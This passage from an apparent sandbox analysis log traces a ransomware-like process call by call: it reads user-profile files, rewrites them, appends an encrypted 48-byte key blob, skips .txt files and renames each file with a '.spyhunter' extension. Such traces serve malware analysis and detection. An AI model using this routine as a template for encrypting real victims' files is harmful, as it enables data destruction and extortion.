Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.210] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0142.210] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".txt") returned 0x0 [0142.210] GetProcessHeap () returned 0x2c0000 [0142.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.210] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f32c*=0x85, lpOverlapped=0x0) returned 1 [0142.211] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.211] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f32c*=0x85, lpOverlapped=0x0) returned 1 [0142.211] GetProcessHeap () returned 0x2c0000 [0142.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.211] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.212] WriteFile (in: hFile=0x178, lpBuffer=0x248f36c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f32c, lpOverlapped=0x0 | out: lpBuffer=0x248f36c*, lpNumberOfBytesWritten=0x248f32c*=0x4, lpOverlapped=0x0) returned 1 [0142.212] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f32c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f32c*=0x30, lpOverlapped=0x0) returned 1 [0142.212] CloseHandle (hObject=0x178) returned 1 [0142.212] GetProcessHeap () returned 0x2c0000 [0142.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.212] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.spyhunter") returned 74 [0142.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.spyhunter")) returned 1 [0142.212] GetProcessHeap () returned 0x2c0000 [0142.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.212] GetProcessHeap () returned 0x2c0000 [0142.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.212] GetProcessHeap () returned 0x2c0000 [0142.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef78a8 | out: hHeap=0x2c0000) returned 1 [0142.213] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f370 | out: pbBuffer=0x248f370) returned 1 [0142.213] GetProcessHeap () returned 0x2c0000 [0142.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.213] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f368*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f368*=0x30) returned 1 [0142.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.213] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0142.213] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".txt") returned 0x0 [0142.213] GetProcessHeap () returned 0x2c0000 [0142.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.213] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f32c*=0x85, lpOverlapped=0x0) returned 1 [0142.214] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.214] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248f32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f32c*=0x85, lpOverlapped=0x0) returned 1 [0142.214] GetProcessHeap () returned 0x2c0000 [0142.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.214] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.214] WriteFile (in: hFile=0x178, lpBuffer=0x248f36c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f32c, lpOverlapped=0x0 | out: lpBuffer=0x248f36c*, lpNumberOfBytesWritten=0x248f32c*=0x4, lpOverlapped=0x0) returned 1 [0142.214] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f32c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f32c*=0x30, lpOverlapped=0x0) returned 1 [0142.214] CloseHandle (hObject=0x178) returned 1 [0142.214] GetProcessHeap () returned 0x2c0000 [0142.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.215] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.spyhunter") returned 78 [0142.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.spyhunter")) returned 1 [0142.215] GetProcessHeap () returned 0x2c0000 [0142.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.215] GetProcessHeap () returned 0x2c0000 [0142.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.215] GetProcessHeap () returned 0x2c0000 [0142.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef9e8 | out: hHeap=0x2c0000) returned 1 [0142.216] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f368 | out: pbBuffer=0x248f368) returned 1 [0142.216] GetProcessHeap () returned 0x2c0000 [0142.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.217] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f360*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f360*=0x30) returned 1 [0142.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.217] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0142.217] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".txt") returned 0x0 [0142.217] GetProcessHeap () returned 0x2c0000 [0142.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.217] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f324, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f324*=0xe2, lpOverlapped=0x0) returned 1 [0142.218] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.218] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x248f324, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f324*=0xe2, lpOverlapped=0x0) returned 1 [0142.218] GetProcessHeap () returned 0x2c0000 [0142.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.218] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.218] WriteFile (in: hFile=0x178, lpBuffer=0x248f364*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f324, lpOverlapped=0x0 | out: lpBuffer=0x248f364*, lpNumberOfBytesWritten=0x248f324*=0x4, lpOverlapped=0x0) returned 1 [0142.218] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f324, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f324*=0x30, lpOverlapped=0x0) returned 1 [0142.219] CloseHandle (hObject=0x178) returned 1 [0142.219] GetProcessHeap () returned 0x2c0000 [0142.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.219] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.spyhunter") returned 68 [0142.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.spyhunter")) returned 1 [0142.219] GetProcessHeap () returned 0x2c0000 [0142.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.219] GetProcessHeap () returned 0x2c0000 [0142.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.219] GetProcessHeap () returned 0x2c0000 [0142.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe368 | out: hHeap=0x2c0000) returned 1 [0142.219] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f360 | out: pbBuffer=0x248f360) returned 1 [0142.219] GetProcessHeap () returned 0x2c0000 [0142.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.220] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f358*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f358*=0x30) returned 1 [0142.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.220] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0142.220] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.220] GetProcessHeap () returned 0x2c0000 [0142.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.220] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f31c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f31c*=0x50, lpOverlapped=0x0) returned 1 [0142.222] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.222] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x248f31c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f31c*=0x50, lpOverlapped=0x0) returned 1 [0142.222] GetProcessHeap () returned 0x2c0000 [0142.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.222] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.222] WriteFile (in: hFile=0x178, lpBuffer=0x248f35c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f31c, lpOverlapped=0x0 | out: lpBuffer=0x248f35c*, lpNumberOfBytesWritten=0x248f31c*=0x4, lpOverlapped=0x0) returned 1 [0142.222] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f31c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f31c*=0x30, lpOverlapped=0x0) returned 1 [0142.222] CloseHandle (hObject=0x178) returned 1 [0142.222] GetProcessHeap () returned 0x2c0000 [0142.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.222] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.spyhunter") returned 58 [0142.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini.spyhunter")) returned 1 [0142.321] GetProcessHeap () returned 0x2c0000 [0142.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.321] GetProcessHeap () returned 0x2c0000 [0142.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.321] GetProcessHeap () returned 0x2c0000 [0142.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec04b0 | out: hHeap=0x2c0000) returned 1 [0142.321] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f360 | out: pbBuffer=0x248f360) returned 1 [0142.321] GetProcessHeap () returned 0x2c0000 [0142.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.322] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f358*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f358*=0x30) returned 1 [0142.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.409] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0142.409] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.409] GetProcessHeap () returned 0x2c0000 [0142.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.409] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f31c*=0x58, lpOverlapped=0x0) returned 1 [0142.410] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffa8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.410] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x248f31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f31c*=0x58, lpOverlapped=0x0) returned 1 [0142.410] GetProcessHeap () returned 0x2c0000 [0142.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.410] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.410] WriteFile (in: hFile=0x178, lpBuffer=0x248f35c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f31c, lpOverlapped=0x0 | out: lpBuffer=0x248f35c*, lpNumberOfBytesWritten=0x248f31c*=0x4, lpOverlapped=0x0) returned 1 [0142.410] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f31c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f31c*=0x30, lpOverlapped=0x0) returned 1 [0142.411] CloseHandle (hObject=0x178) returned 1 [0142.411] GetProcessHeap () returned 0x2c0000 [0142.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.411] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.spyhunter") returned 51 [0142.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\libraries\\desktop.ini.spyhunter")) returned 1 [0142.411] GetProcessHeap () returned 0x2c0000 [0142.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.411] GetProcessHeap () returned 0x2c0000 [0142.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.412] GetProcessHeap () returned 0x2c0000 [0142.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b448 | out: hHeap=0x2c0000) returned 1 [0142.412] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f358 | out: pbBuffer=0x248f358) returned 1 [0142.412] GetProcessHeap () returned 0x2c0000 [0142.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.412] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f350*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f350*=0x30) returned 1 [0142.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.412] GetProcessHeap () returned 0x2c0000 [0142.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.412] GetProcessHeap () returned 0x2c0000 [0142.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e808 | out: hHeap=0x2c0000) returned 1 [0142.412] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f358 | out: pbBuffer=0x248f358) returned 1 [0142.412] GetProcessHeap () returned 0x2c0000 [0142.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.412] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f350*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f350*=0x30) returned 1 [0142.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\." (normalized: "c:\\users\\default\\pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.412] GetProcessHeap () returned 0x2c0000 [0142.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.413] GetProcessHeap () returned 0x2c0000 [0142.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36a68 | out: hHeap=0x2c0000) returned 1 [0142.413] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f350 | out: pbBuffer=0x248f350) returned 1 [0142.413] GetProcessHeap () returned 0x2c0000 [0142.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.413] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f348*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f348*=0x30) returned 1 [0142.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.413] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0142.413] StrStrW (lpFirst="ntuser.ini", lpSrch=".txt") returned 0x0 [0142.413] GetProcessHeap () returned 0x2c0000 [0142.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.413] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f30c*=0x14, lpOverlapped=0x0) returned 1 [0142.414] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.414] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x248f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f30c*=0x14, lpOverlapped=0x0) returned 1 [0142.414] GetProcessHeap () returned 0x2c0000 [0142.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.414] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.415] WriteFile (in: hFile=0x178, lpBuffer=0x248f34c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f30c, lpOverlapped=0x0 | out: lpBuffer=0x248f34c*, lpNumberOfBytesWritten=0x248f30c*=0x4, lpOverlapped=0x0) returned 1 [0142.415] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f30c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f30c*=0x30, lpOverlapped=0x0) returned 1 [0142.415] CloseHandle (hObject=0x178) returned 1 [0142.415] GetProcessHeap () returned 0x2c0000 [0142.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.415] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\ntuser.ini.spyhunter") returned 41 [0142.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini.spyhunter" (normalized: "c:\\users\\default\\ntuser.ini.spyhunter")) returned 1 [0142.415] GetProcessHeap () returned 0x2c0000 [0142.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.416] GetProcessHeap () returned 0x2c0000 [0142.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0142.416] GetProcessHeap () returned 0x2c0000 [0142.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f369e0 | out: hHeap=0x2c0000) returned 1 [0142.416] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f350 | out: pbBuffer=0x248f350) returned 1 [0142.416] GetProcessHeap () returned 0x2c0000 [0142.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0142.416] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f348*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f348*=0x30) returned 1 [0142.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.416] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0142.416] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".txt") returned 0x0 [0142.416] GetProcessHeap () returned 0x2c0000 [0142.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.416] ReadFile 